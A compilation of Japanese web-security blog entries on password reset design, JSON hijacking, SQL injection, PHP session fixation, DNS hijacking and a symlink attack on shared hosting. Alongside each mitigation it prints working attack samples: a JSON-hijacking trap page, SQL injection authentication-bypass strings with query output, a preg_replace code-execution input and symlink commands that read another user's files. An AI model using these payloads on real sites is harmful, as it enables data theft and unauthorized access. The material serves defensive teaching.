• 旧: 現在のパスワードをメールで送信する（パスワードリマインダ）
• 新: パスワード再設定の画面のURLをメールで送信する（パスワードリセット）

パスワードリマインダのリスク

• 現在のパスワードをメール送信できるということは、パスワードをハッシュ値で保存していない証拠である
• メールは平文通信なので、パスワードを書いたメールが盗聴されると被害が甚大になる

パスワードが盗聴されると長期の悪用に気づかない

• パスワードが悪用されていることに利用者が気づくことが難しい
• 悪用が長期間に及ぶ

パスワードリセット方式の優位点

• パスワード再設定できる回数を１回限りとする
• パスワード再設定の結果をメール通知する

• 本来の利用者と第三者のうち、どちらがパスワードを再設定できるかは「早い者勝ち」になるが、運が良ければ第三者による再設定を防げる
• 運悪く、先に第三者によりパスワードを再設定された場合、メール通知により、利用者がその事実に気づくことができる

まとめ

• パスワード再設定できる回数を１回限りとする
• パスワード再設定の結果をメール通知する

追記（13:10）

• パスワード攻撃に対抗するWebサイト側セキュリティ強化策
• パスワードの定期的変更に関する徳丸の意見まとめ
• Gmailの成りすまし事件、傾向と対策
• ログアウト機能の目的と実現方法

とあるサイトのパスワードリセット方式

• パスワードリセット画面では、ユーザIDとメールアドレスを入力する
• ユーザIDとメールアドレスが共に該当するアカウントがないとエラーになる
• サイト側でパスワードがリセットされ、リセット後のパスワードがメール送信される
• 利用者はメール送信されたパスワードによりログインでき、通常の利用が可能となる

問題1.メールのパスワードが盗聴された場合のコントロールがない

対策1.仮パスワード方式を採用する

• 運が良ければ利用者の方が先にパスワードを変更して、第三者の悪用を防げる
• 運悪く第三者が先にパスワードを変更した場合は、本来の利用者は、ログインできないことで悪用の可能性に気づくことができる
• パスワード変更のメール通知機能により、第三者のパスワード変更についてもメールで確認できる

問題2.パスワードリセット機能悪用によるサービス妨害

対策2-1.仮パスワード発行後も元のパスワードでもログイン可能とする

• 仮パスワードが有効な状態で、正式パスワードでログインした場合は、仮パスワードを無効にする
• 上記の場合、「仮パスワードが○月○日○時○分に発行されていましたが無効にしました」などのメッセージを表示する

対策2-2.パスワードリセットの前に秘密の情報を問い合わせる

まとめ

• パスワードリセットのメールが盗聴された場合のコントロールがない
• パスワードリセット機能の悪用によるサービス妨害のリスク

• 仮パスワード方式とする（必須）
• パスワード変更をメールで通知する（必須）
• 仮パスワードの有効期限を設ける（強く推奨）
• 仮パスワード発行後も元のパスワードは有効とする（強く推奨）
• 仮パスワードが有効な状態で、元パスワードでログインした場合は、仮パスワードをキャンセルして警告表示する（推奨）
• パスワードリセットの前に秘密情報を要求する（推奨）

問題の概要

影響を受けるサイト

影響

説明のためのサンプルサイトの説明

<form action="upmemo.php" method="post">
秘密メモ<input name="memo"><br>
<input type="submit" value="登録">
</form>

<?php
  session_start();
  $memo = isset($_POST['memo']) ? $_POST['memo'] : '';
  $_SESSION['memo'] = $memo;
?>
<body>
メモを受け付けました:<?php echo htmlspecialchars($memo, ENT_NOQUOTES, 'UTF-8'); ?><br>
<a href="display.html">メモを表示する</a>
</body>

<html>
<head>
<script src="jquery-1.9.1.min.js"></script>
<script>
$(function() {
  $.ajax({
    dataType: 'json',
    url: 'getMemo.php'
  }).done(function(json) {
    $('#memo').text(json[0].memo);
  });
});
</script>
</head>
<body>
secret memo:<div id="memo"></div>
</body>
</html>

<?php
  header('Content-Type: application/json; charset=utf-8');
  session_start();
  $json['memo'] = $_SESSION['memo'];
  echo json_encode(array($json));

[{"memo":"The king has donkey ears"}]

JSONはなぜ安全か?

• ブラウザには同一生成元ポリシー(Same Origin Policy; SOP)、CORS（Cross-Origin Resource Sharing）という保護機能がある
• アプリケーション側で、ブラウザ側保護機能を活用する呼び出し方をしている

脅威1. クロスドメインのXMLHttpRequest

• XHR2では、異なるオリジンに対してもリクエストは送信される
• ただし、デフォルトではリクエストにCookieは付かない
• デフォルトでは、レスポンスが返ってきてもXHR2はそれを捨ててしまい、JavaScriptコンテンツでは受け取れない
• レスポンスにAccess-Control-Allow-Originヘッダがあり、これに指定されたオリジンが呼び出し元とマッチした場合は、XHR2はレスポンスを返し、JavaScriptコンテンツが受け取ることができる
• リクエストにCookieをつけたい場合は以下を全て行う
• 呼び出し側がXHR2のwithCredentialsプロパティにtrueをセットする（これだけでリクエストにCookieがつく）
• 呼び出された側はAccess-Control-Allow-Originヘッダにワイルドカードを指定できず、オリジンを明示的に指定する（http://example.jp 等）（これがないとレスポンスが受け取れない）
• 呼び出された側はレスポンスヘッダAccess-Control-Allow-Credentials: trueを出力する（withCredentialsプロパティをtrueにした場合、これがないとレスポンスが受け取れない）

<?php
  header('Access-Control-Allow-Origin: http://evil.dwd.jp'); // 追加
  header('Access-Control-Allow-Credentials: true');  // 追加

  header('Content-Type: application/json; charset=utf-8'); // 以下同じ

  $.ajax({
    dataType: 'json',
url: 'http://ex.tokumaru.org/getMemo2.php',
    xhrFields: {
       withCredentials: true
    }
  }).done(function(json) {

脅威2. script要素によるJSON読み込み

<!-- JSONをscript要素のsrc属性で指定して読み出す -->
<script src="http://ex.tokumaru.org/getMemo.php"></script>
<script>
// 呼び出したJSONを読み出す仕掛け
</script>

[{"memo":"The king has donkey ears"}]

foo([{"memo":"The king has donkey ears"}]);

古典的なJSONハイジャック

• Arrayオブジェクトのコンストラクタを再定義する
• setterを使う

Object.prototype.__defineSetter__("memo",
 function(v) {
  // ここで memo プロパティの値が v として読み出せる
 });

vbscriptとしてJSONを読み出す方法

<script>
  window.onerror = function(e) {
    // エラーメッセージeにJSONの一部が入る場合がある
  }
</script>
<script src="http://ex.tokumaru.org/getMemo.php" language="vbscript"></script>

型が一致しません。: '{"memo":"The king has donkey ears"}'

<html>
<head>
<script>
  window.onerror = function(e) {
    if (e.match(/'({"memo".*)'$/)) {
      var msg = 'JSONハイジャックに成功:' + RegExp.$1;
    } else {
      var msg = 'JSONハイジャックに失敗:' + e;
    }
    var divmemo = document.getElementById('memo');
    var text = document.createTextNode(msg);
    divmemo.appendChild(text);
  }
</script>
</head>
<body>
これは罠サイトです(IE限定)
<div id="memo"></div>
<script src="http://ex.tokumaru.org/getMemo.php" language="vbscript"></script>
</body>
</html>

• 罠を閲覧するのは、攻撃者ではなく、攻撃対象サイトの一般利用者です
• 言うまでもないことですが、実際の罠サイトには「これは罠サイトです」と断ってはありません
• 実際の罠サイトでは、盗んだ情報は画面に表示せず、攻撃者が管理するサーバーに送信します

MS13-037での修正

X-Content-Type-Options: nosniffヘッダを使う

header('X-Content-Type-Options: nosniff');

SEC7112: http://ex.tokumaru.org/getMemo.php からのスクリプトは、MIME の種類が一致しないため、ブロックされました 

• X-Content-Type-Options: nosniff つかわないやつは死ねばいいのに!
• X-Content-Type-Options: nosniffのつけ方

その他の対策方法

1. POSTリクエストのみ受け付ける
2. JavaScriptとして不完全なJSONを返す
3. while(1);等を先頭に入れて、script要素として読み込むと無限ループにする
4. X-Requested-Withヘッダのチェック

X-Requested-With: XMLHttpRequest

まとめ

• JSONを返すスクリプトの先頭でX-Requested-WithヘッダがXMLHttpRequestとなっていることを確認（ヘッダがあるという確認でも良い）
• JSONを返すレスポンス（できれば全てのコンテンツ）に、X-Content-Type-Options: nosniff ヘッダをつける

概要

影響

影響を受けるバージョン

再現方法

脆弱性の発生するメカニズム

case 'replace_prefix_tbl':
  $current = $selected[$i];
  $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);

preg_replace("/^/e\0/", "phpinfo();", "test");

preg_replace("/^/e", "phpinfo();", "test");

対策

脆弱性の根本原因

preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);

/\//

preg_replace("/^" . preg_quote($from_prefix, '/') . "/", $to_prefix, $current);

• preg_replaceの仕様が危なっかしいものであり、過去にも脆弱性の原因になってきた
• preg_quoteの信頼感があまりなかった（憶測）
• 元々正規表現を必要としない処理である

preg_replaceの代替処理

• 正規表現は原則として固定とする
• preg_replace関数のe修飾子の代わりに、preg_replace_callbackを使用する
• preg_replaceの代わりに、mb_ereg_replaceまたはmb_ereg_replace_callback(PHP5.4.1以降)の使用を検討する

PHP5.4.7におけるPCRE関数の変更

なお、システムで PHP 5.4.6 以前のバージョンを利用する環境のみが、この脆弱性の影響を受けます。
phpMyAdmin の preg_replace() 関数の不適切な利用に起因する任意コード実行の脆弱性（Scan Tech Report）

PHP Warning:  preg_replace(): Null byte in regex in /home/…/preg-nullbyte.php on line 2

まとめ

ヤフーは２３日、今月１６日に不正アクセスで流出した「ヤフージャパン」のＩＤ２２００万件のうち、約１４９万件についてはパスワードと、パスワード変更のために使う「秘密の質問」への答えも同時に流出していた可能性が高いと発表した。パスワードは暗号化されており「解読は不可能」（広報）としている。
　「秘密の質問」の答えは暗号化されておらず、ハッカーに見られる可能性が高いが、パスワードを変えるには今回流出していない生年月日も入力する必要があり、広報は「本人以外が不正にログインするおそれはない」としている。
朝日新聞デジタル：ヤフー、パスワード１４９万件流出 「秘密の質問」も - 社会より引用（魚拓）

• 生年月日は流出していないということだが、SNSなどから比較的容易に取得できる情報である
• 「秘密の質問と回答」および生年月日がそろうと、パスワードがリセットできる（現在は停止中）
• それだけでなく、同じ組み合わせで、ワンタイムパスワードも解除できる（現在は停止中）
• 加えて、同じ組み合わせで、シークレットIDも解除できる（現在は停止中）

Date:    Sat, 03 Nov 2012 18:22:11 +0900
Subject: Yahoo!のパスワードリセットの問題点について
----
Yahoo Incident Response Division御中
徳丸と申します。
Yahoo!のログインについて、仕様が好ましくないと考えております。
Yahoo!のパスワードは、生年月日と『秘密の「質問」と「答え」』が分かっていればリセットできます。『秘密の「質問」と「答え」』はID登録後変更できないので、安易なものをつけてしまったら取り返しの付かないことになると考えます。
参考:
http://help.yahoo.co.jp/help/jp/edit/edit-43.html
> 秘密の「質問」と「答え」の内容は、Yahoo! JAPAN IDの登録後に、確認および変更できません。
ワンタイムパスワード設定すれば、上記リスクを軽減できるかを考えました。しかし、ワンタイムパスワードの解除も、生年月日と『秘密の「質問」と「答え」』が分かっていればできてしまいます。ログイン中でなくても可です。
シークレットIDというログイン専用のIDを設定すると安全性が高まるかと期待したのですが、駄目でした。Yahoo!IDと生年月日と『秘密の「質問」と「答え」』を知っていると、シークレットIDを解除できます。つまり、Yahoo!IDと生年月日と『秘密の「質問」と「答え」』を知っていると、ワンタイムパスワードの設定も、シークレットIDの設定も解除でき、パスワードをリセットできます。
脆弱性とまではいえないものの、非常に好ましくない仕様だと思います。
『秘密の「質問」と「答え」』を無効にできるようにするか、せめて後から変更できるようにすべきだと思います。

Date:    Mon, 5 Nov 2012 06:30:56 +0000
Subject: RE: Yahoo!のパスワードリセットの問題点について
----
徳丸様
お世話になっております。
Yahoo Incident Response Division(ヤフー)の○○と申します。
この度はご指摘、ご助言を頂き誠に有難うございます。
ご指摘頂きましたYahoo！ログインの問題に関しては弊社内でも認識しており、現在サービス仕様の見直しを実施しております。
サービス仕様の見直しに際しては、ご指摘頂いた点も含めて十分な安全性の検討/改善を行う予定です。
今後ともお気づきの点がございましたら、是非ともご指摘の程宜しくお願い申し上げます。
以上、宜しくお願い致します。
**********************************************
ヤフー株式会社
CSO室情報セキュリティ

• 「秘密の質問と回答」は現在必須だが、設定しないという選択も許す
• 「秘密の質問と回答」は現在一度設定すると変更・解除できないが、変更および解除できるようにする
• 「秘密の質問」は選択制だが､利用者の自由記述も選択できるようにする
• 朝日新聞の報道によると「秘密の質問と回答」は暗号化されていないようだが、暗号化して保存する
• 「秘密の質問と回答」よりも強度の高い、乱数やワンタイムパスワード生成アプリを活用した復帰手段等を利用者が選択できるようにする

• Yahoo! ID
• 登録済みメールアドレス
• 確認コード（数字6桁）

• パスワードリセットに使えるメールアドレスは誰にも教えない運用にする
• シークレットIDを指定する
• ワンタイムパスワード(2段階認証)を設定する

まとめ

• Yahoo!のメールによるパスワードリセットで用いる「確認コード」は数字6桁であり総当たり耐性が低い
• シークレットID、ワンタイムパスワードによるリスク緩和を推奨する

http://example.jp/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/

/abc/abc/abc/${@print(md5(base64_decode(MzYwd2Vic2Nhbg)))}/

• MzYwd2Vic2Nhbg がクォートされていない
• } の前にセミコロンがない

$ php
<?php
@print(md5(base64_decode(MzYwd2Vic2Nhbg)));
ed1e83f8d8d90aa943e4add2ce6a4cbf

• Web サイト改ざんに関する注意喚起(JPCERT/CC)
• 2013年6月の呼びかけ 「 ウェブサイトが改ざんされないように対策を！ 」(IPA)
• @Police ウェブサイト改ざん事案の多発に係る注意喚起について(pdf)
• 5月から多発しているHP改ざんインシデントをまとめてみた。 - piyolog

• FTPをやめ、sshのみで管理運用
• sshのパスワード認証を禁止し、鍵認証のみとする
• sshサーバーのIPアドレス制限
• 脆弱性管理
• …

• サイトの管理用PCがゼロデイ脆弱性でマルウェアに感染し、管理用PCを踏み台として、管理用PCに保存された秘密鍵によりsshからログインされる
• サーバーソフトのゼロデイ脆弱性により侵入される
• VPSのコントロールパネルに脆弱性がある場合、コントロールパネルに侵入され、シングルユーザーモードからrootパスワードを変更された後、コントロールパネルのリモートコンソールからログインされる
• …

• Tripwire(オープンソース版)
• inotifywait

inotifywaitによる改変検知

$ sudo apt-get install inotify-tools

$ sudo inotifywait -m -e create,delete,modify,move,attrib --format '%T %w %f %e' -r --timefmt '%F %T' /etc

$ sudo touch /etc/xxxxx

2013-06-16 22:36:57 /etc/ xxxxx CREATE
2013-06-16 22:36:57 /etc/ xxxxx ATTRIB

• /etc/ 以下の設定ファイル
• バイナリ
• Webコンテンツ(.htaccess等含む)
• その他

効果・まとめ

同課によると、同級生との間には当時トラブルがあり、男子生徒は「自分の悪口をメールに書いているのではないか」と考え、盗み見たという。
男子生徒は、パスワードを再設定しようと「秘密の質問」のペットの名前に何度か答え、合致しパスワードを変更した。
ログインできなくなった同級生がパスワードを変更し直したが、男子生徒は再びパスワードを変更したという。同級生が「身に覚えのないログインがある」と警察に相談し、容疑が明らかになった。
不正アクセスで県内中学生を初摘発 容疑で県警、同級生のメール盗み見より引用（赤字は引用者）

「秘密の質問と答え」とは何か

秘密の質問と答えの問題点

• １度登録すると、取り消しも変更もできない（但し例外あり…後述）
• 登録時に、秘密と質問と答えが重大な影響をもたらすことを説明していない
• 「あなたしか知らない質問と答え」とあるが、質問は選択制なので利用者が自由に記述できない
• 質問の選択肢には、「父親の出身地」、「卒業旅行で行った場所」、「1番年上のいとこの名前」、「初めて勤めた会社の場所」など、第三者が知っている可能性の高いものが多い

秘密の質問と答えでどこまでできるか

• パスワードのリセット（再設定）
• ワンタイムパスワードの解除
• シークレットIDの解除
• アカウントロックの解除

ケーススタディ

• ワンタイムパスワード
• シークレットID
• ログインアラート
• ログインシール

• X氏は秘密の質問と答え、生年月日により、シークレットIDを解除する(ヘルプ)
• X氏は秘密の質問と答え、生年月日によりパスワードをリセットする(ヘルプ)
• X氏がリセットしたパスワードでログインしようとするとワンタイムパスワードを問われる
• X氏は秘密の質問と答え、生年月日により、ワンタイムパスワードを解除する(ヘルプ)
• X氏は再度、リセットしたパスワードでログインを試し、今度は成功する

• X氏は秘密の質問と答え、生年月日により、ログインロックを解除する(ヘルプ)

「秘密の質問と答え」の問題を避ける方法はあるか?

Yahoo!ウォレットに登録すれば秘密の質問と答えは変更できる

• 「Yahoo!ウォレット」に登録していること
• 免許証あるいは住民票のスキャンデータを送信すること

Yahoo!アカウントを作り直す

• 秘密の質問と答えを登録せず、ワンタイムパスワードは諦める
• 秘密の質問と答えを登録して、ワンタイムパスワードを使う
• 秘密の質問と答えを登録して、ワンタイムパスワードは使わない

ログインアラートの問題点

上記のログインに心当たりがない場合は、以下をご確認ください。
■心当たりのないログイン、利用であった場合

 1. 「ログイン履歴」と「登録情報」に心当たりがない情報がないかご確認ください。

  ◇ ログイン履歴
    https://lh.login.yahoo.co.jp/

  ◇ 登録情報ページの見方
    http://help.yahoo.co.jp/help/jp/edit/edit-54.html

 2. 心当たりがない情報があった場合は、下記のURLにアクセスし、一時的にログインできない状態に設定すること（ログインロック）をおすすめします。

  ◇ ログインロック    https://login.yahoo.co.jp/alert/lock?.ea=wOlemehXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
    ※URLの有効期限：2013/06/09 12:14:37

1. まずは普通にログインする
2. ログインできたら、不正アクセスの可能性を考慮してパスワードを変更する
3. ログインできなかった場合パスワードリセットする（結果としてパスワードは変わる）
4. ログイン履歴から、本当に不正アクセスかどうかなどを調べる（勘違いという可能性もある）
5. IPアドレス、アクセス元の国などからその後の対処を決める

パスワード変更通知の問題点

あなたが上記のYahoo! JAPAN IDでパスワード変更をしたおぼえがない場合
=================================================================
自分のパスワードでYahoo! JAPANにログインできるかどうかを確認してください。
ログインできない場合は、お手数ですが、下記のヘルプをご確認ください。
http://help.yahoo.co.jp/help/jp/edit/edit-63.html

「パスワード変更の確認」メールは、パスワード変更を行うと、Yahoo! JAPAN IDの登録メールアドレスあてに、自動的に送信されます。
■確認メールの本文に記載されたYahoo! JAPAN IDをお使いの場合
メールに心あたりがない場合、念のため、こちらからお使いのYahoo! JAPAN IDとパスワード（※）を入力して、問題なくYahoo! JAPANにログインできるかをお試しください。
※メールに記載されているパスワードではなく、普段お使いのパスワードを入力してください。

• ログインできなくなった場合は、パスワードを再設定し、再度ログインをお試しください。
  再設定方法は「パスワードを忘れてしまった」をご覧ください。
• 万が一、第三者に利用されている可能性がある場合は、こちらをご覧ください。

結局どうすればよいか

• 「秘密の質問と答え」は乱数のような文字列を設定して、印刷したものを安全な場所に保管する
• 既存の「秘密の質問と答え」が安全でない場合は、前述の方法で再設定依頼するか、アカウントを作り直す
• 新規にアカウントを作成する場合は、「秘密の質問と答え」を設定しない運用も検討する

まとめ

app.netの共同創設者、Bryan Berg氏はその原因を「DNSハイジャック」によるものではないかと指摘している。Berg氏は、「その間LinkedInにアクセスしたユーザーのトラフィックは、Confluence-Networksがホスティングしていたネットワークに送信されていた」と述べ、しかもサイトではSSLを利用していなかったことから、長い有効期限が設定されていたCookieが平文のまま送信された可能性があるとしている。
LinkedInでアクセス障害、原因はDNSハイジャックとの指摘 - ＠IT より引用

DNSハイジャックとは

• example.jpの権威DNSサーバー(レンタルDNSサーバー含む)が不正アクセスされた（脆弱性の例）
• example.jpのレジストラのコントロールパネルが不正アクセスされた（他国の例）
• JPドメイン名のレジストリ(JPRS)が不正アクセスされた（他国ではまれにあります; 参考）
• example.jpの管理者がドメイン情報の設定を間違えた（たまにあります）

DNSハイジャックの影響

• 秘密情報の漏洩
• コンテンツの書き換え
• サービス停止（今回のLinkedInでも起こった）
• なりすまし

対策

• 少なくとも入力フォームからSSLとする
• サイト全体をSSLとする（いわゆる常時SSL）を検討する
• 機密性の要求されるCookieにセキュア属性を付与する

• 会社ホームページは常時SSLとする
• DNS情報の監視スクリプトの稼働

まとめ

攻撃対象プログラム

<?php
  header('Content-Type: text/html; charset=UTF-8');
  $id = $_GET['id'];   // ユーザID
  $pwd = $_GET['pwd']; // パスワード
  // データベースに接続
  $dbh = new PDO('pgsql:dbname=wasbook host=localhost', 'wasbook', 'wasbook'); // Postgres用
  //$dbh = new PDO('mysql:dbname=test', USERNAME, PASSWORD');   // MySQL用
  // SQLの組み立て
  $sql = "SELECT * FROM users WHERE id ='$id' AND pwd = '$pwd'";
  $stmt = $dbh->query($sql);  // クエリー実行
?>
<html>
<body><?php
  echo 'sql= ' . htmlspecialchars($sql, ENT_NOQUOTES, 'UTF-8') . '<br>';
  if ($stmt->rowCount() > 0) { // SELECTした行が存在する場合ログイン成功
    echo 'ログイン成功です';
  } else {
    echo 'ログイン失敗です';
  }
  $dbh = 0;
?></body>
</html>

CREATE TABLE users (id varchar(10) NOT NULL PRIMARY KEY,  pwd varchar(10) NOT NULL);
INSERT INTO users VALUES ('yamada','sn6s3n');
INSERT INTO users VALUES ('tanaka','a2f9hy');

認証回避の基本形

' or 'a'='a

SQLコメントを使う

あくまで論理和にこだわる

SELECT * FROM users WHERE id ='' AND pwd = ''OR 1=1#'

できるだけ短い文字数の真値を探す

• 'OR 1#   (6文字)
• 'OR'1     (5文字)

• '1'
• 'TRUE'
• 'TRU'
• 'TR'
• 'T'
• 't'

• '0'
• 'FALSE'
• 'FALS'
• 'FAL'
• 'FA'
• 'F'
• 'f'

• 1
• 'a'
• 'truex'

• 'OR'1   （5文字）
• 'OR't    （5文字）

SELECT * FROM users WHERE id ='' AND pwd = ''OR't'

さらに短くできないか

mysql> SELECT * FROM users WHERE 0 | '1';
+--------+--------+
| id     | pwd    |
+--------+--------+
| tanaka | a2f9hy |
| yamada | sn6s3n |
+--------+--------+
2 rows in set (0.00 sec)

mysql> SELECT * FROM users WHERE id='' AND pwd=''|'1';
Empty set, 2 warnings (0.00 sec)

SELECT * FROM users WHERE id='' AND pwd=(''|'1');

まとめ

• 文字数制限があって脆弱性の影響がないと言い張る人の論破
• IPSやWAFの回避技術や、回避技術の対抗策の検討

@masa141421356さんの攻撃例

@ockeghem大抵のDBでid=''OR' AND pwd='>' ' が通ると思います（id側に「'OR」, pwd側に「>' 」で6文字）。長さ0の文字列がNULL扱いされないDBなら最後のスペースを消して5文字です。
— masa141421356 (@masa141421356) June 24, 2013

やまざきさんの攻撃例

@masa141421356@ockeghem MySQLで、id=''' AND pwd='|''; （idに「'」、pwdに「|'」の計3文字）（|の代わりに&や^も）が動いてしまって悩む。id=0の意味？
— やまざきkei5 (@ymzkei5) June 24, 2013

mysql> select ''' AND pwd = '|'';
+--------------------+
| ''' AND pwd = '|'' |
+--------------------+
|                  0 |
+--------------------+
1 row in set, 2 warnings (0.00 sec)

mysql> SELECT * FROM users WHERE id=0;
+--------+--------+
| id     | pwd    |
+--------+--------+
| tanaka | a2f9hy |
| yamada | sn6s3n |
+--------+--------+
2 rows in set, 2 warnings (0.00 sec)

まとめ

• TOKUMARU.BUNKYO.TOKYO.JP （私のドメイン名）
• MITA.MINATO.TOKYO.JP （三田典玄氏のドメイン名）

• CITY.MACHIDA.TOKYO.JP : 町田市の本物のドメイン名（地域型JPドメイン名）
• CITY.MACHIDA.KANAGAWA.JP : 筆者のドメイン名（のサブドメイン名）（都道府県型JPドメイン名）

まとめ

追記

やっとStrict Sessionがマージされました。8年越しです。... http://t.co/ZBuVTHunqy
— Yasuo Ohgaki (大垣靖男) (@yohgaki) August 5, 2013

• Sessions:
• Implemented strict sessions RFC (https://wiki.php.net/rfc/strict_sessions) which protects against session fixation attacks and session collisions.

PHP 5 ChangeLog より引用

session.use_strict_mode = On

<?php
  session_start();
  if (isset($_SESSION['counter'])) {
    $_SESSION['counter']++;
  } else {
    $_SESSION['counter'] = 0;
  }
  echo 'phpversion: ' . htmlspecialchars(phpversion()) . '<br>';
  echo 'session_id: ' . htmlspecialchars(session_id()) . '<br>';
  echo 'counter : ' . htmlspecialchars($_SESSION['counter']);

phpversion: 5.5.2
session_id: i0h3ej9hcs6dd40sopac9pf483
counter : 0>

$ sudo cat /tmp/sess_i0h3ej9hcs6dd40sopac9pf483
counter|i:0;$

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=7irqs0dkccnusq9ckjcnlmkn21; path=/
Content-Length: 74
Content-Type: text/html

phpversion: 5.5.2<br>session_id: i0h3ej9hcs6dd40sopac9pf483<br>counter : 0

PHP Warning:  session_start(): The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/session.php on line 2

まとめ

追記(2013/08/17 21:00)

追記(2013/08/21 9:00)

関連するエントリ

• セッションアダプションに対する私の見解
• PHPのセッションアダプションは今でもある
• PHPのSession Adoptionは重大な脅威ではない

• ログイン直後にsession_regenerate_id関数によりセッションIDを振り直す

• ログイン直後にsession_regenerate_id関数によりセッションIDを振り直す

• ログイン前
• ログイン処理
• ログイン状態の確認処理
• ログアウト処理

ログイン前

ログイン処理

• ログインに失敗した場合は、セッションID悪用防止のためセッションを破棄する
• 元々ログイン状態の場合は、ログイン処理を継続しない。攻撃者のログイン状態のセッションIDによる攻撃を防ぐため

session_start();
if (ログイン済みの状態) {
  echo "ログイン済みです";
  // マイページなど、遷移可能なページへのリンクを表示
  // あるいは、異常事態としてセッション破棄するという考え方もあり
} else if (idとパスワードが有効) {
  // ログイン処理
  $_SESSION['user'] = $id;
  // その他の処理
} else {
  echo "IDまたはパスワードが違います";
  // 認証失敗の場合はセッションを破棄
  session_destroy();
}

ログイン状態の確認処理

session_start();
if (! isset($_SESSION['user'])) {
  echo 'ログインしてください';
  // ログインページへのリンクを表示
  exit;
}

session_destroy();

ログアウト処理

$_SESSION['user'] = false; // 認証ユーザをfalseにすることでログアウトとする

アプリ側のセッションタイムアウトに対する注意

• ログイン状態の確認処理の中で、タイムアウトしたセッションを破棄する
• ログイン処理においては、タイムアウトしたセッションは、いったん破棄して、再度セッションを開始する。

まとめ

• ログイン前にはセッションを使用しない
• ログインに失敗した場合は、セッションを破棄する
• 元々ログイン状態の場合は、ログイン処理を継続しない
• ログイン状態の確認において、ログイン状態でない場合はセッションを破棄する
• ログアウト処理ではセッションを破棄する
• ログイン状態の確認処理の中で、タイムアウトしたセッションを破棄する
• ログイン処理においては、タイムアウトしたセッションは、いったん破棄して、再度セッションを開始する

• ログイン直後にsession_regenerate_id関数によりセッションIDを振り直す

29日夜の時点では、攻撃者の改ざん手法について「WordPressのプラグインやテーマの脆弱性を利用」し、不正なファイルがアップロードされて「wp-config.phpの」の設定情報が抜き出されたと説明していたが、30日午後7時過ぎの説明で、この脆弱性が侵入経路となって同社のパーミッション設定の不備を悪用されたことが原因だったことを明らかにした。
「ロリポップ」のWordPressサイト改ざん被害、原因はパーミッション設定不備より引用

サーバーの設定を変更しFollowSymLinksを無効にしました。
当社サービス「ロリポップ！レンタルサーバー」ユーザーサイトへの第三者による大規模攻撃についてより引用

デモ環境の説明

$ ls -l
drwx-----x  3 suzuki      LolipopUser 4096 Aug 31 17:26 suzuki/
drwx-----x  3 tanaka      LolipopUser 4096 Aug 31 17:39 tanaka/
$

レンタルサーバーの利用者間では、ファイルは閲覧できない

$ su - tanaka
Password:  ←パスワードを入力
tanaka$ pwd
/home/tanaka
tanaka$ ls -l
total 8
-rw-r--r-- 1 tanaka LolipopUser  465 Sep  1 23:45 log.txt
drwxr-xr-x 2 tanaka LolipopUser 4096 Sep  1 23:39 www
tanaka$ ls -l ../suzuki/
ls: cannot open directory ../suzuki/: Permission denied  ← 別ユーザのディレクトリは参照できない
tanaka$ cat ../suzuki/www/index.html
cat: ../suzuki/www/index.html: Permission denied  ← 別ユーザのコンテンツも同様
tanaka$

閲覧権限がないファイルにシンボリックリンクを設定できる

tanaka$ cd www
tanaka$ ln -s ../../suzuki/www/index.html suzuki.html
tanaka$ cat suzuki.html
cat: suzuki.html: Permission denied  ← シンボリックリンクは作れるが参照はできない
tanaka$

• CGIプログラムやPHPスクリプトのソースが閲覧できる
• 非公開ディレクトリのファイルが閲覧できる場合がある

閲覧できない情報をシンボリックリンク攻撃により表示する

tanaka$ ln -s ../../suzuki/www/inquiry.php inquiry.txt

tanaka$ ln -s ../../suzuki/log.txt log.txt

tanaka$ su - suzuki
Password:
suzuki$ ls -l log.txt
-rw-r--r-- 1 suzuki LolipopUser 465 Sep  1 23:45 log.txt
suzuki$

シンボリックリンク攻撃が成立する条件

• FollowSymLinksが有効になっているか、攻撃者が.htaccessによりFollowSymLinksを有効にできる
• 攻撃者が、公開ディレクトリにシンボリックリンクを設定できる

• 攻撃者がレンタルサーバーのユーザとなる（お試し等でも可）
• 攻撃者がレンタルサーバーのユーザtanakaを攻撃して、tanakaの書き込み権限を得る

• 外部公開のURLからファイル名を推定する
• スクリプトのソースファイルからファイル名を得る
• WordPress等の標準的なファイル構成からファイル名を得る

シンボリックリンク攻撃の脅威

対策

まとめ

追記(2013/09/03 10:00)

参考文献

• IPAセキュアプログラミング講座 第9章 ファイル対策
• JPCERT/CC POS01-C. ファイルを操作するときにはリンクが存在するかどうかを検査する

• 日時：2013年9月14日（土曜日） 10時00分～（徳丸の出番は12:00～12:45）
• 場所：大田区産業プラザ（PiO)
• 費用：無料（申し込みはこちら）
• 講演タイトル：安全なPHPアプリケーションの作り方2013

• パスワードの守り方
• セッションフィクセイション結局どうする
• PHPのライフサイクルにどうつきあう?
• HTML5セキュリティ入門

1. XHR Level2によるCSRFにてパスワード変更
2. JSONハイジャックによる個人情報漏えい
3. 広告モジュールのDOM Based XSS(単独では影響なし)
4. ドメイン名販売ページでの潜在的なDOM Based XSS(単独では影響なし)
5. 3と4の合わせ技で大変なことに…

• XMLHttpRequest Level2 
• localStorage
• postMessage
• クロスサイト・リクエストフォージェリ(CSRF)
• DOM Based XSS

$ cat bug65475.phpt
--TEST--
Bug #65475: Session ID is not initialized when session.usr_strict_mode=1
--INI--
session.save_handler=files
session.name=PHPSESSID
--SKIPIF--
<?php include('skipif.inc'); ?>
--FILE--
<?php
ob_start();

echo "Testing file module".PHP_EOL;
session_start();
$_SESSION['foo'] = 1234;
$_SESSION['cnt'] = 1;
$session_id = session_id();
session_write_close();

session_start();
var_dump($session_id === session_id());
$_SESSION['cnt']++;
session_write_close();

session_start();
var_dump($session_id === session_id());
var_dump($_SESSION['cnt']); // Should be int(2)
session_write_close();

--EXPECTF--
Testing file module
bool(true)
bool(true)
int(2)

ockeghem@php552:~/php-5.5.2/ext/session/tests$ pear run-tests bug65475.phpt
Running 1 tests
PASS Bug #65475: Session ID is not initialized when session.usr_strict_mode=1[bug65475.phpt]
TOTAL TIME: 00:00
1 PASSED TESTS
0 SKIPPED TESTS

まとめ

• PHP5.5.4にてstrict sessionのバグ(65475)が修正され、ようやくstrict sessionsが使えるようになった
• 上記バグに関するテストbug65475.phptにはバグがあり、PHP5.5.3以前でもFAILしない
